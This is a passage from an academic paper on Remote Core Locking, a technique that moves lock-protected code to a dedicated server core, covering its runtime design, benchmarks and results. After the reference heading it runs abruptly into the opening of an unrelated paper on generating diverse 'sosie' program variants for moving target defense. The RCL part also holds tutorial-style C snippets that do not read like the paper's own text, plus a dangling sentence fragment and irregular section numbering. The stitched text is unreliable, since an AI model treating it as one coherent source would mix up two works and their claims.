The reengineering also addresses a common case of fine-grained locking, illustrated in lines 5-9 of Fig. 4, where a conditional in the critical section releases the lock and returns from the function. In this case, the code is transformed such that the critical section returns a flag value indicating which unlock ended the critical section, and the code following the remote procedure call then executes the code following the unlock that is indicated by the flag value. Fig. 5 shows the complete result of transforming the code of Fig. 4.

The transformation furthermore modifies various other lock manipulation functions to use the RCL runtime. In particular, the function for initializing a lock receives additional arguments indicating whether the lock should be implemented as an RCL. Finally, the reengineering tool also generates a header file, incorporating the profiling information, that the developer can edit to indicate which lock initializations should create POSIX locks and which ones should use RCLs.

### 3 Implementation of the RCL Runtime

Legacy applications may use ad hoc synchronization mechanisms and rely on libraries that themselves may block or spin. The core algorithm of Sec. 2.1 refers to only a single servicing thread, and thus requires that this thread is never blocked at the OS level and never spins in an active wait loop.
In this section, we describe how the RCL runtime ensures liveness and responsiveness in these cases, and present implementation details.

### 3.1 Ensuring Liveness and Responsiveness

Three sorts of situations may induce liveness or responsiveness problems. First, the servicing thread could be blocked at the OS level, e.g., because a critical section tries to acquire a POSIX lock that is already held, performs an I/O, or waits on a condition variable. Indeed, we have found that roughly half of the multithreaded applications that use POSIX locks in Debian 6.0.3 (October 2011) also use condition variables. Second, the servicing thread could spin if the critical section tries to acquire a spinlock or a nested RCL, or implements some form of ad hoc synchronization [20]. Finally, a thread could be preempted at the OS level when its timeslice expires [29], or because of a page fault. Blocking and waiting within a critical section risk deadlock, because the server is unable to execute critical sections associated with other locks, even when doing so may be necessary to allow the blocked critical section to unblock. Additionally, blocking of any form, including waiting and preemption, degrades the responsiveness of the server because a blocked thread is unable to serve other locks managed by the same server.
**Ensuring liveness** To ensure liveness, the RCL runtime manages a pool of threads on each server such that when a servicing thread blocks or waits, there is always at least one other free servicing thread that is not currently executing a critical section, and this servicing thread will eventually be elected. To ensure the existence of a free servicing thread, the RCL runtime provides a management thread, which is activated regularly at each expiration of a timeout (we use the Linux time-slice value) and runs at highest priority. When activated, the management thread checks that at least one of the servicing threads has made progress since its last activation, using a server-global flag `is_alive` that is set by the servicing threads. If it finds that this flag is still cleared when it wakes up, it assumes that all servicing threads are either blocked or waiting, and adds a free thread to the pool of servicing threads.

**Ensuring responsiveness** The RCL runtime implements a number of strategies to improve responsiveness. First, it avoids thread preemption by the OS scheduler by using the POSIX FIFO scheduling policy, which allows a thread to execute until it blocks or yields the processor. Second, it tries to reduce the delay before an unblocked servicing thread is rescheduled by minimizing the number of servicing threads, thus minimizing the length of the FIFO queue. Accordingly, a servicing thread suspends when it observes that there is at least one other free servicing thread, i.e., one other thread able to handle requests. Third, to address the case where all servicing threads are blocked in the OS, the RCL runtime uses a backup thread, which has lower priority than all servicing threads, that simply clears the `is_alive` flag and wakes up the management thread.
Finally, when a critical section needs to execute a nested RCL managed by the same core and the lock is already owned by another servicing thread, the servicing thread immediately yields, to allow the owner of the lock to release it. The use of the FIFO policy raises two further liveness issues. First, FIFO scheduling may induce a priority inversion between the backup thread and the servicing threads, or between the servicing threads and the management thread. To avoid this problem, the RCL runtime uses only lock-free algorithms and threads never wait on a resource. Second, if a servicing thread is in an active wait loop, it will not be preempted, and a free thread will not be elected. When the management thread detects no progress, i.e., `is_alive` is false, it thus also acts as a scheduler, electing a servicing thread by first decrementing and then incrementing the priorities of all the servicing threads, effectively moving them to the end of the FIFO queue. This is expensive, but is only needed when a thread spins for a long time, which is a sign of poor programming, and is not triggered in our benchmarks.

### 3.2 Algorithm details

We now describe some issues of the algorithm in detail.

**Serving RCLs** Alg. 1 shows the code executed by a servicing thread. The fast path (lines 6-16) is the only code that is executed when there is only one servicing thread in the pool. A slow path (lines 17-24) is additionally executed when there are multiple servicing threads. Lines 9-15 of the fast path implement the RCL server loop as described in Sec. 2.1; the thread indicates that it is not free by decrementing (line 8) and incrementing (line 16) `number_of_freeThreads`. Because the thread may be preempted due to a page fault, all operations on variables shared between the threads, including `number_of_freeThreads`, must be atomic.
To avoid the need to reallocate the request array when new client threads are created, the size of the request array is fixed and chosen to be very large (256K), and the client identifier allocator implements an adaptive long-lived renaming algorithm [6] that keeps track of the highest client identifier and tries to reallocate smaller ones. The slow path is executed if the active servicing thread detects that other servicing threads exist (line 17). If the other servicing threads are all executing critical sections (line 18), the servicing thread simply yields the processor (line 19). Otherwise, it goes to sleep (lines 21-24).

**Executing a critical section** A client that tries to acquire an RCL, or a servicing thread that tries to acquire an RCL managed by another core, submits a request and waits for the function pointer to be cleared (Alg. 2, lines 6-9). If the RCL is managed by the same core, the servicing thread must actively wait until the lock is free. During this time it repeatedly yields, to give the CPU to the thread that owns the lock (lines 11-12).

**Management and backup threads** If, on wake up, the management thread observes, based on the value of `is_alive`, that none of the servicing threads has progressed since the previous timeout, then it ensures that at least one free thread exists (Alg. 3, lines 8-19) and forces the election (lines 20-27) of a thread that has not been recently elected. The backup thread (lines 31-34) simply sets `is_alive` to false and wakes up the management thread.

### 4 Evaluation

We first present a microbenchmark that identifies when critical sections execute faster with RCL than with the other lock algorithms. We then correlate this information with the results of the profiler, so that a developer can use the profiler to identify which locks to transform into RCLs. Finally, we analyze the performance of the applications identified by the profiler for all lock algorithms.
Our evaluations are performed on a 48-core machine having four 12-core Opteron 6172 processors, running Ubuntu 11.10 (Linux 3.0.0), with gcc 4.6.1 and glibc 2.13.

### 4.1 Microbenchmark

We have developed a custom microbenchmark to measure the performance of RCL relative to four other lock algorithms: CAS Spinlock, POSIX, MCS [18] and Flat Combining [13]. These algorithms are briefly presented in Fig. 6. To our knowledge, MCS and Flat Combining are currently the most efficient.

| Algorithm | Description |
|---|---|
| Spinlock | CAS loop on a shared cache line. |
| POSIX | CAS, then sleep. |
| MCS | CAS to insert the pending CS at the end of a shared queue. Busy wait for completion of the previous CS on the queue. |
| Flat Combining | Periodic CAS to elect a client that acts as a server, periodic collection of unused requests. Provides a generic interface, but not combining, as appropriate to support legacy applications: the server only iterates over the list of pending requests. |

Fig. 6: The evaluated lock algorithms.

Our microbenchmark executes critical sections repeatedly on all cores, except one that manages the lifecycle of the threads. For RCL, this core also executes the RCL server. We vary the degree of contention on the lock by varying the delay between the execution of the critical sections: the shorter the delay, the higher the contention. We also vary the locality of the critical sections by varying the number of shared cache lines each one accesses (references and updates). To ensure that cache line accesses are not pipelined, we construct the address of the next memory access from the previously read value [30]. Fig. 7(a) presents the average number of L2 cache misses (top) and the average execution time of a critical section (bottom) over 5000 iterations when critical sections access one shared cache line. This experiment measures the effect of lock access contention. Fig.
7(b) then presents the increase in execution time incurred when each critical section instead accesses 5 cache lines. This experiment measures the effect of data locality of shared cache lines. Highlights are summarized in Fig. 7(c).

With one shared cache line, at high contention, RCL performs better because Flat Combining has to periodically elect a new combiner. At low contention, RCL is slower than Spinlock by only 209 cycles. This is negligible since the lock is seldom used. In this case, Flat Combining is not efficient because after executing its critical section, the combiner must iterate over the list of requests before resuming its own work.

RCL incurs the same number of cache misses when each critical section accesses 5 cache lines as it does for one cache line, as the data remains on the RCL server.\(^3\) At low contention, each request is served immediately, and the performance difference is also quite low. At higher contention, each critical section has to wait for the others to complete, incurring an increase in execution time of roughly 47 times the increase at low contention. Like RCL, Flat Combining has few or no extra cache misses at high contention, because cache lines stay with the combiner, which acts as a server. At low contention, the number of extra cache misses is variable, because the combiner often has no other critical sections to execute. These extra cache misses increase the execution time. POSIX and MCS have 4 extra cache misses when reading the 4 extra cache lines, and incur a corresponding execution time increase.

\(^3\)Using the SSE3 `monitor/mwait` instructions on the client side when waiting for a reply from the server, as described in Sec. 2.1, induces a latency overhead of less than 30% at both high and low contention. This makes the energy-efficient version of RCL quantitatively similar to the original RCL implementation presented here.
Finally, Spinlock is particularly degraded at high contention when accessing 5 cache lines, as the longer duration of the critical section increases the amount of time the thread spins, and thus the number of CAS it executes. To estimate which locks should be transformed into RCLs, we correlate the percentage of time spent in critical sections observed using the profiler with the critical section execution times observed using the microbenchmark. Fig. 8 shows the result of applying the profiler to the microbenchmark in the one cache line case with POSIX locks. To know when RCL becomes better than all other locks, we focus on POSIX and MCS: Flat Combining is always less efficient than RCL and Spinlock is only efficient at very low contention. We have marked the delays at which, as shown in Fig. 7(a), the critical section execution time begins to be significantly higher when using POSIX and MCS than when using RCL. RCL becomes more efficient than POSIX when 20% of the application time is devoted to critical sections, and it becomes more efficient than MCS when this ratio is 70%. These results are preserved, or improved, as the number of accessed cache lines increases, because the execution time increases more for the other algorithms than for RCL.
--- 4Our analysis assumes that the targeted applications use POSIX locks, but a similar analysis could be made for any type of lock. ---

4 Application performance

The two metrics offered by the profiler, i.e. the time spent in critical sections and the number of cache misses, do not, of course, completely determine whether an application will benefit from RCL. Many other factors (critical section length, interactions between locks, etc.) affect critical section execution. We find, however, that using the time spent in critical sections as our main metric and the number of cache misses in critical sections as a secondary metric works well; the former is a good indicator of contention, and the latter of data locality. To evaluate the performance of RCL, we have measured the performance of the applications listed in Fig. 3 with the lock algorithms listed in Fig. 7. Memcached with Flat Combining is omitted, because it periodically blocks on condition variables, which Flat Combining does not support. We present only the results for the applications (and locks) that the profiler indicates as potentially interesting. Replacing the other locks has no performance impact. Fig. 9(a) presents the results for all of the applications for which the profiler identified a single lock as the bottleneck. For RCL, each of these applications uses only one server core. Thus, for RCL, we consider that we use \(N\) cores if we have \(N - 1\) threads and 1 server, while we consider that we use \(N\) cores if we have \(N\) threads for the other lock algorithms. The top of the figure (\(\times\alpha : n/m\)) reports the improvement \(\alpha\) over the execution time of the original application on one core, the number \(n\) of cores that gives the shortest execution time (i.e., the scalability peak), and the minimal number \(m\) of cores for which RCL is faster than all other locks.
The histograms show the ratio of the shortest execution time for each application using POSIX locks to the shortest execution time with each of the other lock algorithms.\(^5\) Fig. 9(b) presents the results for Berkeley DB with 100 clients (and hence 100 threads) running TPC-C’s Order Status and Stock Level transactions. Since MCS cannot handle more than 48 threads, due to the convoy effect, we have also implemented MCS-TP \([12]\), a variation of MCS with a spinning timeout to resist convoys. In the case of RCL, the two most used locks have been placed on two different RCL servers, leaving 46 cores for the clients. Additionally, we study the impact of the number of simultaneous clients on the number of transactions treated per second for Stock Level transactions (see Fig. 11). **Performance analysis** For the applications that spend 20-70\% of their time in critical sections when using POSIX locks (Raytrace/Balls4, String Match, and Memcached/Set), RCL gives significantly better performance than POSIX locks, but in most cases it gives about the same performance as MCS and Flat Combining, as predicted by our microbenchmark. For Memcached/Set, however, which spends only 54\% of the time in critical sections when using POSIX locks, RCL gives a large improvement over all other approaches, because it significantly improves cache locality. When using POSIX locks, Memcached/Set critical sections have on average 32.7 cache misses, which roughly correspond to accesses to 30 shared cache lines, plus the cache misses incurred for the management of POSIX locks. Using RCL, the 30 shared cache lines remain in the server cache. Fig. 10 shows that for Memcached/Set, RCL performs worse than other locks when fewer than four cores are used due to the fact that one core is lost for the server, but from 5 cores onwards, this effect is compensated by the performance improvement offered by RCL. \(^5\)For Memcached, the execution time is the time for processing 10,000 requests. 
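The \(\times\alpha : n/m\) summary reported atop Fig. 9(a) can be computed mechanically from per-core-count execution times. The array layout and names here are ours: `t_rcl[k]` and `t_other[k]` are the execution times with \(k+1\) cores, with `t_other` holding the best non-RCL lock at each core count:

```c
/* Sketch of the (xalpha : n/m) summary from per-core-count timings.
 * Illustrative names and layout; not the paper's tooling. */
#include <stddef.h>

struct summary {
    double alpha;  /* best improvement over the 1-core original   */
    int n;         /* core count giving the shortest RCL time     */
    int m;         /* first core count where RCL beats all others */
};

struct summary summarize(const double *t_rcl,
                         const double *t_other, /* best non-RCL lock */
                         size_t ncores, double t_orig_1core) {
    struct summary s = { 0.0, 1, 0 };
    double best = t_rcl[0];
    for (size_t k = 0; k < ncores; k++) {
        if (t_rcl[k] < best) {           /* track the scalability peak */
            best = t_rcl[k];
            s.n = (int)k + 1;
        }
        if (s.m == 0 && t_rcl[k] < t_other[k])
            s.m = (int)k + 1;            /* first win over other locks */
    }
    s.alpha = t_orig_1core / best;
    return s;
}
```

For RCL, remember that `k+1` cores here means `k` client threads plus one server core, as explained above.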
only a slight performance improvement. This application is intrinsically unable to scale for the considered data set; even though the use of RCL reduces the amount of time spent in critical sections to 1% (Fig. 12), the best resulting speedup is only 5.8 times for 20 cores. Memcached/Get spends more than 80% of its time in critical sections, but is only slightly improved by RCL as compared to MCS. Its critical sections are long, and thus acquiring and releasing locks is less of a bottleneck than with other applications. In the case of Berkeley DB, RCL achieves a speedup of 4.3 for Order Status transactions and 7.7 for Stock Level transactions with respect to the original Berkeley DB implementation for 100 clients. This is better than expected, since, according to our profiler, the percentage of time spent in critical sections is respectively only 53% and 55%, i.e. less than the 70% threshold. This is due to the fact that Berkeley DB uses hybrid Test-And-Set/POSIX locks, and our profiler was designed for POSIX locks: the time spent in the Test-And-Set loop is not included in the "time in critical sections" metric. When the number of clients increases, the throughput of all implementations degrades. Still, RCL performs better than the other lock algorithms, even though two cores are reserved for the RCL servers and thus do not directly handle requests. In fact, the cost of the two server cores is amortized from 5 clients onwards. The best RCL speedup over the original implementation is for 40 clients, with a factor of 14. POSIX is robust for a large number of threads and comes second after RCL. MCS-TP [12] resists convoys, but with some overhead. MCS-TP and Flat Combining have comparable performance.

**Locality analysis** Figure 12 presents the number of L2 cache misses per critical section observed on the RCL server for the evaluated applications.
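A hybrid Test-And-Set/POSIX lock of the kind the text attributes to Berkeley DB can be sketched as a bounded trylock spin followed by a blocking acquisition; the constant and function names are ours, not Berkeley DB's code. The time spent in the spin loop is exactly the time a POSIX-oriented profiler fails to attribute to critical sections:

```c
/* Hybrid lock sketch: busy-wait briefly in user space, then block.
 * Illustrative only; Berkeley DB's actual implementation differs. */
#include <pthread.h>

#define SPIN_TRIES 100

void hybrid_lock(pthread_mutex_t *m) {
    /* fast path: spin, hoping the holder releases soon --
     * a POSIX-lock profiler does not count this waiting time */
    for (int i = 0; i < SPIN_TRIES; i++)
        if (pthread_mutex_trylock(m) == 0)
            return;
    /* slow path: give up spinning and block in the kernel */
    pthread_mutex_lock(m);
}

void hybrid_unlock(pthread_mutex_t *m) {
    pthread_mutex_unlock(m);
}

/* small correctness demo: two threads increment a shared counter */
static pthread_mutex_t demo_mutex = PTHREAD_MUTEX_INITIALIZER;
static long demo_counter;

static void *demo_worker(void *arg) {
    (void)arg;
    for (int i = 0; i < 50000; i++) {
        hybrid_lock(&demo_mutex);
        demo_counter++;
        hybrid_unlock(&demo_mutex);
    }
    return NULL;
}

long run_hybrid_demo(void) {
    pthread_t t1, t2;
    demo_counter = 0;
    pthread_create(&t1, NULL, demo_worker, NULL);
    pthread_create(&t2, NULL, demo_worker, NULL);
    pthread_join(t1, NULL);
    pthread_join(t2, NULL);
    return demo_counter;
}
```

This structure explains the better-than-expected Berkeley DB numbers: the profiler's 53%/55% figures undercount contention because the spin phase is invisible to it.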
Critical sections trigger on average fewer than 4 cache misses, of which the communication between the client and the server itself costs one cache miss. Thus, on average, at most 3 cache lines of context information are accessed per critical section. This shows that passing variables to and from the server does not hurt performance in the evaluated applications. <table> <thead> <tr> <th>Application</th> <th>L2 cache misses on the RCL server</th> </tr> </thead> <tbody> <tr> <td>Raytrace/Car</td> <td>1.8</td> </tr> <tr> <td>Raytrace/Ball4</td> <td>1.8</td> </tr> <tr> <td>Linear Regression</td> <td>2.4</td> </tr> <tr> <td>Matrix Multiply</td> <td>3.2</td> </tr> <tr> <td>String Match</td> <td>3.2</td> </tr> <tr> <td>Memcached/Get</td> <td>N/A†</td> </tr> <tr> <td>Memcached/Set</td> <td>N/A†</td> </tr> <tr> <td>Berkeley DB/Order Status</td> <td>3.3</td> </tr> <tr> <td>Berkeley DB/Stock Level</td> <td>3.6</td> </tr> </tbody> </table> Fig. 12: Number of L2 cache misses per critical section on the RCL server. † We are currently unable to collect L2 cache misses when using blocking on RCL servers.

**False Serialization** A difficulty in transforming Berkeley DB for use with RCL is that the call in the source code that allocates the two most used locks also allocates nine other less used locks. The RCL runtime requires that, for a given lock allocation site, all allocated locks are implemented in the same way, and thus all 11 locks must be implemented as RCLs. If all 11 locks are on the same server, their critical sections are artificially serialized. To prevent this, the RCL runtime makes it possible to choose the server core where each lock will be dispatched. To study the impact of this false serialization, we consider two metrics: the false serialization rate and the use rate. The false serialization rate is the ratio of the number of iterations over the request array where the server finds critical sections associated with at least two different locks to the number of iterations where at least one critical section is executed.
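The false serialization rate defined above, and the use rate discussed next, can both be computed from a per-iteration trace of the server loop. The record layout and function names here are ours, for illustration only:

```c
/* Sketch of the two server-side metrics, computed from a trace in
 * which each record describes one iteration over the request array.
 * The trace format is illustrative, not the RCL runtime's data. */
struct iter_record {
    int executed;       /* critical sections executed this iteration */
    int distinct_locks; /* distinct locks among those sections       */
};

/* Fraction of "useful" iterations (>= 1 CS executed) that mixed
 * critical sections of at least two different locks. */
double false_serialization_rate(const struct iter_record *t, int n) {
    int useful = 0, mixed = 0;
    for (int i = 0; i < n; i++) {
        if (t[i].executed > 0) {
            useful++;
            if (t[i].distinct_locks >= 2)
                mixed++;
        }
    }
    return useful ? (double)mixed / useful : 0.0;
}

/* Average number of critical sections per useful iteration,
 * normalized by the number of cores. */
double use_rate(const struct iter_record *t, int n, int cores) {
    long total = 0;
    int useful = 0;
    for (int i = 0; i < n; i++) {
        if (t[i].executed > 0) {
            useful++;
            total += t[i].executed;
        }
    }
    return useful ? (double)total / useful / cores : 0.0;
}
```

Iterations that execute no critical section are excluded from both denominators, mirroring the footnote about startup and shutdown phases.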
The use rate measures the server workload. It is computed as the total number of executed critical sections divided by the number of iterations where at least one critical section is executed,6 giving the average number of clients waiting for a critical section on each iteration, which is then divided by the number of cores. Therefore, a use rate of 1.0 means that all elements of the array contain pending critical section requests, whereas a low use rate means that the server mostly spins on the request array, waiting for critical sections to execute.

Fig. 13 shows the false serialization rate and the use rate for Berkeley DB (100 clients, Stock Level): (i) with one server for all locks, and (ii) with two different servers for the two most used locks, as previously described. Using one server, the false serialization rate is high and has a significant impact because the use rate is also high. When using two servers, the use rate of the two servers goes down to 5%, which means that they are no longer saturated and that false serialization is eliminated. This allows us to improve the throughput by 50%.

<table> <thead> <tr> <th></th> <th>False serialization rate</th> <th>Use rate</th> <th>Transactions/s</th> </tr> </thead> <tbody> <tr> <td>One server</td> <td>91%</td> <td>81%</td> <td>13.9</td> </tr> <tr> <td>Two servers</td> <td>&lt;1% / &lt;1%</td> <td>5% / 5%</td> <td>28.7</td> </tr> </tbody> </table> Fig. 13: Impact of false serialization with RCL.

--- 6We do not divide by the total number of iterations, because there are many iterations in application startup and shutdown that execute no critical sections and have no impact on the overall performance. ---

5 Related Work

Many approaches have been proposed to improve locking [1, 8, 13, 15, 24, 26, 27]. Some improve the fairness of lock algorithms or reduce the data bus load [8, 24]. Others switch automatically between blocking locks and spinlocks depending on the contention rate [15]. Others, like RCL, address data locality [13, 27]. GLocks [1] addresses at the hardware level the problem of latency due to cache misses of highly-contended locks by using a token-ring between cores. When a core receives the token, it serves a pending critical section, if it has one, and then forwards the token. However, only one token is used, so only one lock can be implemented. Suleman et al. [27] transform critical sections into remote procedure calls to a powerful server core on an asymmetric multicore. Their communication protocol is also implemented in hardware and requires a modified processor. They do not address blocking within critical sections, which can be a problem with legacy library code. RCL works on legacy hardware and allows blocking. Flat Combining [13] temporarily transforms the owner of a lock into a server for other critical sections. Flat Combining is unable to handle blocking in a critical section, because there is only one combiner. At low contention, Flat Combining is not efficient because the combiner has to check whether pending requests exist, in addition to executing its own code. In RCL, the server may also uselessly scan the array of pending requests, but as the server has no other code to execute, it does not incur any overall delay. Sridharan et al. [26] increase data locality by associating an affinity between a core and a lock. The affinity is determined by intercepting Futex [9] operations, and the Linux scheduler is modified so as to schedule the lock requester on the preferred core of the lock. This technique does not address the access contention that occurs when several cores try to enter their critical sections. Roy et al. [23] have proposed a profiling tool to identify critical sections that work on disjoint data sets, in order to optimize them by increasing parallelism. This approach is complementary to ours. Lock-free structures have been proposed in order to avoid using locks for traditional data structures such as counters, linked lists, stacks, or hashtables [14, 16, 25]. These approaches never block threads. However, such techniques are only applicable to the specific types of data structures considered. For this reason, locks are still commonly used on multicore architectures. Finally, experimental operating systems and databases designed with manycore architectures in mind use data replication to improve locality [28] and even RPC-like mechanisms to access shared data from remote cores [4, 7, 11, 19, 22]. These solutions, however, require a complete overhaul of the operating system or database design. RCL, on the other hand, can be used with current systems and applications with few modifications.

6 Conclusion

RCL is a novel locking technique that focuses on both reducing lock acquisition time and improving the execution speed of critical sections through increased data locality. The key idea is to migrate critical-section execution to a server core. We have implemented an RCL runtime for Linux that supports a mixture of RCL and POSIX locks in a single application. To ease the reengineering of legacy applications, we have designed a profiling-based methodology for detecting highly contended locks and implemented a tool that transforms critical sections into remote procedure calls.
Our performance evaluations on legacy benchmarks and widely used legacy applications show that RCL improves performance when an application relies on highly contended locks. In future work, we will consider the design and implementation of an adaptive RCL runtime. Our first goal will be to be able to dynamically switch between locking strategies, so as to dedicate a server core only when a lock is contended. Second, we want to be able to migrate locks between multiple servers, to dynamically balance the load and avoid false serialization. One of the challenges will be to implement low-overhead run-time profiling and migration strategies. Finally, we will explore the possibilities of RCL for designing new applications. Availability The implementation of RCL as well as our test scripts and results are available at http://rclrepository.gforge.inria.fr. Acknowledgments We would like to thank Alexandra Fedorova and our shepherd Wolfgang Schröder-Preikschat for their insightful comments and suggestions. References
Tailored Source Code Transformations to Synthesize Computationally Diverse Program Variants

Benoit Baudry, INRIA/IRISA, Rennes, France, benoit.baudry@inria.fr
Simon Allier, INRIA/IRISA, Rennes, France, simon.allier@inria.fr
Martin Monperrus, University of Lille & INRIA, Lille, France, martin.monperrus@univ-lille1.fr

HAL Id: hal-00938855, https://hal.archives-ouvertes.fr/hal-00938855, submitted on 29 Jan 2014

ABSTRACT The predictability of program execution provides attackers with a rich source of knowledge, which they can exploit to spy on or remotely control the program. Moving target defense addresses this issue by constantly switching between many diverse variants of a program, which reduces the certainty that an attacker can have about the program execution. The effectiveness of this approach relies on the availability of a large number of software variants that exhibit different executions. However, current approaches rely on the natural diversity provided by off-the-shelf components, which is very limited. In this paper, we explore the automatic synthesis of large sets of program variants, called sosies. Sosies provide the same expected functionality as the original program, while exhibiting different executions. They are said to be computationally diverse. This work addresses two objectives: comparing different transformations for increasing the likelihood of sosie synthesis (densifying the search space for sosies); and demonstrating computation diversity in synthesized sosies. We synthesized 30,184 sosies in total, for 9 large, real-world, open source applications. For all these programs we identified one type of program analysis that systematically increases the density of sosies; we measured computation diversity for sosies of 3 programs and found diversity in method calls or data in more than 40% of sosies.
This is a step towards controlled, massive unpredictability of software.

1. INTRODUCTION

Predictability of software execution is a weakness with respect to cybersecurity. For example, the ability to predict a program’s memory layout or its set of machine code instructions allows attackers to design code injection attacks. All solutions that address the mitigation of these weaknesses are founded on the diversification of programs or their environments. For example, address space layout randomization introduces artificial diversity by randomizing the memory location of certain system components. The objective is to make the memory layout unpredictable from one machine to another, or even from one run of the program to another. Similarly, instruction set randomization generates a diversity of machine instructions to prevent the predictability of the assembly language for a given architecture. More recently, moving target defense proposes to use a large number of program variants and to continually shift between them at runtime. This approach aims at making the attack space unpredictable to the attacker by reducing the predictability of a program’s control and data flow. The success of moving target defense relies on two essential ingredients: the availability of a large number of program variants that implement diverse executions; and the ability to switch between variants at runtime. This work focuses on the first ingredient. We propose a novel technique to automatically synthesize a large set of program variants that provide the same expected functionality as the original program and yet exhibit computation diversity. We define a novel form of program variant that we call sosie programs (“sosie” is French for “look-alike”). A program P′ is said to be a sosie of a program P if the code of P′ is different from that of P while P′ still exhibits the same verified external behavior as P, i.e., still passes the same test suite as P.
This work compares different program transformations for the automatic synthesis of sosie programs. The process of searching for program variants satisfying our sosie definition is called “sosiefication”; the set of all possible program variants obtainable with the transformations forms the search space of sosie synthesis. All the considered transformations have a random component to explore the space of all program variants. Yet, from an engineering perspective, randomness does not mean inefficiency, and we want these transformations to produce large quantities of sosies in a reasonable amount of time. The goal of the transformations is thus to increase the likelihood of sosie synthesis, given a fixed budget (e.g. time or resources). Consequently, we compare different kinds of program analysis and transformations with respect to their ability to confine the search to a space in which the density of potential sosies is high. Also, with respect to moving target defense, the resulting sosies must exhibit executions different from that of the original program. We measure this diversity in terms of divergence in method calls and data between the sosies and the original.

Acknowledgements: We thank Ioannis Kavvouras for his participation in the experiments, Westley Weimer and Eric Schulte for their expert feedback on this paper, as well as our colleagues for insightful discussions and feedback. This work is partially supported by the EU FP7-ICT-2011-9 No. 600654 DIVERSIFY project.

We present an extensive evaluation of the synthesis of sosie programs. We set up 9 program transformations, some of them purely random while others involve some program analysis. They are all based on the same idea of removing, adding or replacing statements in source code. The transformations are applicable to Java programs and are applied to 9 open source code bases.
This enables us to answer two main research questions: 1) what are the most fruitful synthesis techniques to generate sosie programs (sosie density)? 2) how is the execution of sosies different from the execution of the original program (computational diversity)?

To sum up, the contributions of the paper are:
- the definition of “sosie program” and “sosiefication”;
- 9 source code transformations for the automatic synthesis of sosie programs;
- the empirical evidence of the existence of very large quantities of software sosies given our transformations and dataset in Java;
- the empirical evaluation of the effectiveness of those different transformations with respect to sosie density and computational diversity.

The paper is organized as follows. Section 2 defines the concepts of “sosie software” and “sosiefication”. Section 3 presents a large scale empirical study on the presence of software sosies and the difficulty of synthesizing them. Section 4 outlines the related work and Section 5 sets up a research agenda on the exploitation of computational diversity.

2. SOFTWARE SOSIES

In this section we define what a “software sosie” is. We discuss an automatic synthesis process of software sosies based on source code transformation and static analysis. We describe how the process can be configured with different transformation strategies.

2.1 Definition of Software Sosie

**Definition 1. Sosie (noun).** Given a program P, a test suite TS for P and a program transformation T, a variant P′ = T(P) is a sosie of P if the two following conditions hold: 1) there is at least one test case in TS that executes the part of P that is modified by T; 2) all test cases in TS pass on P′.

Sosies are identical to the original program with respect to the test suite: they have the same observed behavior as P. The word sosie is a French word that literally means “look-alike”: there exist “sosies” of Madonna (the famous singer).
Since software sosies do not have a visual component, we propose the term "sosie" as an alternative to "look alike". From a behavioral perspective, the sosies of P "look like" P, since they exhibit the same observable behavior. The objective of sosies is to provide behaviorally identical yet computationally diverse variants of a program.

**Definition 2. Sosiefication.** Sosiefication is the process of synthesizing software sosies. Sosie synthesis is performed through source code transformation on a program P and produces program variants, some of which are sosies. The ideal sosiefication process would guarantee that 1) the resulting program is a sosie and 2) the resulting program is computationally diverse (i.e., its execution differs with respect to a domain-specific security monitoring criterion). This is a hard problem; instead of transformations that would yield 100% sosies, we study transformations that maximize the likelihood of finding interesting sosies. Consequently, sosie synthesis is not performed through "any" code transformation. The transformation is carefully crafted with a clear objective in mind. It is not a random mutation but the voluntary modification of one piece of code. In this paper, we discuss sosiefication in general and 9 sosie synthesis transformations, all of which aim to maximize the likelihood of finding interesting sosies. While sosies can appear to be mutants in the sense of mutation testing [6], we believe they are fundamentally different. The intention of the process is different: sosie synthesis aims at generating software diversity meant to be used in production, while mutants for mutation testing are meant to simulate faults in order to improve the fault detection power of test suites.
The intention of the transformations is different: mutation operators are meant to mimic faults, while our transformations are meant to increase computational diversity while keeping the same observable behavior.

2.2 Synthesis of Software Sosies

The sosiefication (sosie synthesis) process takes three kinds of input: a program for which one wants to generate sosies, the test suite for this program, and a program transformation. The transformation can optionally be configured or calibrated for the software under sosiefication. Then, the transformation is applied to generate as many program variants as needed. These program variants are candidates to be sosies. The variants are executed against the test suite to assert whether they preserve the original functionality defined by the test suite. If the test suite passes, they are real sosies. Figure 1 illustrates this synthesis process.

2.3 Program Transformations for Sosiefication

We propose source code transformations that are based on the modification of the abstract syntax tree (AST). As in previous work [18, 20], we consider three families of transformation that manipulate statement nodes of the AST: 1) remove a node in the AST (Delete); 2) add a node just after another one (Add); 3) replace a node by another one, e.g., a statement node is replaced by another statement (Replace). For "Add" and "Replace", the transplantation point refers to where a statement is inserted, the transplant refers to the statement that is copied and inserted, and both the transplantation point and the transplant are in the same AST (we neither synthesize new code nor take code from other programs). For "Add", the transplantation point is a location between two existing statements; for "Replace", it refers to the replacee, the statement that is replaced. The set of all statements that can be transplanted at a given point is called the set of transplant candidates.
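As a toy illustration of the three families, a method body can be modeled as a flat list of statements (a real implementation manipulates full AST nodes, e.g. with Spoon; the class and method names here are hypothetical).

```java
import java.util.ArrayList;
import java.util.List;

// Toy model of the three transformation families applied to a flat
// list of statement strings standing in for AST statement nodes.
public class Transformations {
    // "Delete": remove the statement at index i.
    public static List<String> delete(List<String> stmts, int i) {
        List<String> out = new ArrayList<>(stmts);
        out.remove(i);
        return out;
    }

    // "Add": insert the transplant just after the transplantation point i.
    public static List<String> add(List<String> stmts, int i, String transplant) {
        List<String> out = new ArrayList<>(stmts);
        out.add(i + 1, transplant);
        return out;
    }

    // "Replace": the replacee at index i is substituted by the transplant.
    public static List<String> replace(List<String> stmts, int i, String transplant) {
        List<String> out = new ArrayList<>(stmts);
        out.set(i, transplant);
        return out;
    }
}
```

Note that "Replace" is conceptually a "Delete" followed by an "Add" at the same point, an observation the paper returns to when comparing sosie densities.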
The transformations that randomly add, replace and delete statements are called "add-Random", "replace-Random" and "delete". These transformations provide us with a baseline to analyze the efficiency of sosiefication. Despite the simplicity of delete/add/replace, it is still possible to perform several analyses to increase the likelihood of finding sosies within a given sample of variants. First, one can add preconditions on the statements to be added or replaced (Section 2.4). Second, one can exploit the fact that names carry meaning (Section 2.5). Third, one can drive the addition and replacement with the information given by static type declarations (Section 2.6). All these analyses express a kind of compatibility between the transplantation point and the transplant. In total, we define nine source code transformations.

2.4 Preconditions for "Add" and "Replace"

